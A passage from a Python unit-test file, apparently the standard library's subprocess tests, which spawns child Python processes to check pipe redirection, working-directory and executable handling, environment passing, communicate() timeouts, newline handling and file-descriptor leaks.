'p.wait(); assert p.stdout is None;')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test_stdout_none')
def test_stderr_none(self):
# .stderr is None when not redirected
p = subprocess.Popen([sys.executable, "-c", 'print("banana")'],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stdin.close)
p.wait()
self.assertEqual(p.stderr, None)
def _assert_python(self, pre_args, **kwargs):
# We include sys.exit() to prevent the test runner from hanging
# whenever python is found.
args = pre_args + ["import sys; sys.exit(47)"]
p = subprocess.Popen(args, **kwargs)
p.wait()
self.assertEqual(47, p.returncode)
def test_executable(self):
# Check that the executable argument works.
#
# On Unix (non-Mac and non-Windows), Python looks at args[0] to
# determine where its standard library is, so we need the directory
# of args[0] to be valid for the Popen() call to Python to succeed.
# See also issue #16170 and issue #7774.
doesnotexist = os.path.join(os.path.dirname(sys.executable),
"doesnotexist")
self._assert_python([doesnotexist, "-c"], executable=sys.executable)
def test_executable_takes_precedence(self):
# Check that the executable argument takes precedence over args[0].
#
# Verify first that the call succeeds without the executable arg.
pre_args = [sys.executable, "-c"]
self._assert_python(pre_args)
self.assertRaises((FileNotFoundError, PermissionError),
self._assert_python, pre_args,
executable="doesnotexist")
@unittest.skipIf(mswindows, "executable argument replaces shell")
def test_executable_replaces_shell(self):
# Check that the executable argument replaces the default shell
# when shell=True.
self._assert_python([], executable=sys.executable, shell=True)
# For use in the test_cwd* tests below.
def _normalize_cwd(self, cwd):
# Normalize an expected cwd (for Tru64 support).
# We can't use os.path.realpath since it doesn't expand Tru64 {memb}
# strings. See bug #1063571.
with support.change_cwd(cwd):
return os.getcwd()
# For use in the test_cwd* tests below.
def _split_python_path(self):
# Return normalized (python_dir, python_base).
python_path = os.path.realpath(sys.executable)
return os.path.split(python_path)
# For use in the test_cwd* tests below.
def _assert_cwd(self, expected_cwd, python_arg, **kwargs):
# Invoke Python via Popen, and assert that (1) the call succeeds,
# and that (2) the current working directory of the child process
# matches *expected_cwd*.
p = subprocess.Popen([python_arg, "-c",
"import os, sys; "
"sys.stdout.write(os.getcwd()); "
"sys.exit(47)"],
stdout=subprocess.PIPE,
**kwargs)
self.addCleanup(p.stdout.close)
p.wait()
self.assertEqual(47, p.returncode)
normcase = os.path.normcase
self.assertEqual(normcase(expected_cwd),
normcase(p.stdout.read().decode("utf-8")))
def test_cwd(self):
# Check that cwd changes the cwd for the child process.
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
self._assert_cwd(temp_dir, sys.executable, cwd=temp_dir)
def test_cwd_with_pathlike(self):
temp_dir = tempfile.gettempdir()
temp_dir = self._normalize_cwd(temp_dir)
class _PathLikeObj:
def __fspath__(self):
return temp_dir
self._assert_cwd(temp_dir, sys.executable, cwd=_PathLikeObj())
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_arg(self):
# Check that Popen looks for args[0] relative to cwd if args[0]
# is relative.
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python])
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, rel_python, cwd=python_dir)
@unittest.skipIf(mswindows, "pending resolution of issue #15533")
def test_cwd_with_relative_executable(self):
# Check that Popen looks for executable relative to cwd if executable
# is relative (and that executable takes precedence over args[0]).
python_dir, python_base = self._split_python_path()
rel_python = os.path.join(os.curdir, python_base)
doesntexist = "somethingyoudonthave"
with support.temp_cwd() as wrong_dir:
# Before calling with the correct cwd, confirm that the call fails
# without cwd and with the wrong cwd.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python)
self.assertRaises(FileNotFoundError, subprocess.Popen,
[doesntexist], executable=rel_python,
cwd=wrong_dir)
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, doesntexist, executable=rel_python,
cwd=python_dir)
def test_cwd_with_absolute_arg(self):
# Check that Popen can find the executable when the cwd is wrong
# if args[0] is an absolute path.
python_dir, python_base = self._split_python_path()
abs_python = os.path.join(python_dir, python_base)
rel_python = os.path.join(os.curdir, python_base)
with support.temp_dir() as wrong_dir:
# Before calling with an absolute path, confirm that using a
# relative path fails.
self.assertRaises(FileNotFoundError, subprocess.Popen,
[rel_python], cwd=wrong_dir)
wrong_dir = self._normalize_cwd(wrong_dir)
self._assert_cwd(wrong_dir, abs_python, cwd=wrong_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable_with_cwd(self):
python_dir, python_base = self._split_python_path()
python_dir = self._normalize_cwd(python_dir)
self._assert_cwd(python_dir, "somethingyoudonthave",
executable=sys.executable, cwd=python_dir)
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
@unittest.skipIf(sysconfig.is_python_build(),
"need an installed Python. See #7774")
def test_executable_without_cwd(self):
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
self._assert_cwd(os.getcwd(), "somethingyoudonthave",
executable=sys.executable)
def test_stdin_pipe(self):
# stdin redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.stdin.write(b"pear")
p.stdin.close()
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_filedes(self):
# stdin is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
os.write(d, b"pear")
os.lseek(d, 0, 0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=d)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdin_fileobj(self):
# stdin is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b"pear")
tf.seek(0)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.exit(sys.stdin.read() == "pear")'],
stdin=tf)
p.wait()
self.assertEqual(p.returncode, 1)
def test_stdout_pipe(self):
# stdout redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read(), b"orange")
def test_stdout_filedes(self):
# stdout is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=d)
p.wait()
os.lseek(d, 0, 0)
self.assertEqual(os.read(d, 1024), b"orange")
def test_stdout_fileobj(self):
# stdout is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("orange")'],
stdout=tf)
p.wait()
tf.seek(0)
self.assertEqual(tf.read(), b"orange")
def test_stderr_pipe(self):
# stderr redirection
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=subprocess.PIPE)
with p:
self.assertStderrEqual(p.stderr.read(), b"strawberry")
def test_stderr_filedes(self):
# stderr is set to open file descriptor
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
d = tf.fileno()
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=d)
p.wait()
os.lseek(d, 0, 0)
self.assertStderrEqual(os.read(d, 1024), b"strawberry")
def test_stderr_fileobj(self):
# stderr is set to open file object
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("strawberry")'],
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"strawberry")
def test_stderr_redirect_with_no_stdout_redirect(self):
# test stderr=STDOUT while stdout=None (not set)
# - grandchild prints to stderr
# - child redirects grandchild's stderr to its stdout
# - the parent should get grandchild's stderr in child's stdout
p = subprocess.Popen([sys.executable, "-c",
'import sys, subprocess;'
'rc = subprocess.call([sys.executable, "-c",'
' "import sys;"'
' "sys.stderr.write(\'42\')"],'
' stderr=subprocess.STDOUT);'
'sys.exit(rc)'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
#NOTE: stdout should get stderr from grandchild
self.assertStderrEqual(stdout, b'42')
self.assertStderrEqual(stderr, b'') # should be empty
self.assertEqual(p.returncode, 0)
def test_stdout_stderr_pipe(self):
# capture stdout and stderr to the same pipe
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
with p:
self.assertStderrEqual(p.stdout.read(), b"appleorange")
def test_stdout_stderr_file(self):
# capture stdout and stderr to the same open file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdout=tf,
stderr=tf)
p.wait()
tf.seek(0)
self.assertStderrEqual(tf.read(), b"appleorange")
def test_stdout_filedes_of_stdout(self):
# stdout is set to 1 (#1531862).
# To avoid printing the text on stdout, we do something similar to
# test_stdout_none (see above). The parent subprocess calls the child
# subprocess passing stdout=1, and this test uses stdout=PIPE in
# order to capture and check the output of the parent. See #11963.
code = ('import sys, subprocess; '
'rc = subprocess.call([sys.executable, "-c", '
' "import os, sys; sys.exit(os.write(sys.stdout.fileno(), '
'b\'test with stdout=1\'))"], stdout=1); '
'assert rc == 18')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
out, err = p.communicate()
self.assertEqual(p.returncode, 0, err)
self.assertEqual(out.rstrip(), b'test with stdout=1')
def test_stdout_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertStderrEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertStderrEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen((sys.executable, "-c", "pass"), **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertStderrEqual(stderr, b"")
def test_universal_newlines(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen([sys.executable, "-c", "pass"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
# Don't use assertStderrEqual because it strips CR and LF from output.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen([sys.executable, "-c", "pass"])
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen([sys.executable, "-c", "pass"], None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(OSError) as c:
subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# ignore errors that indicate the command was not found
if c.exception.errno not in (errno.ENOENT, errno.EACCES):
raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(['nonexisting_i_hope'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
@unittest.skipIf(threading is None, "threading required")
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
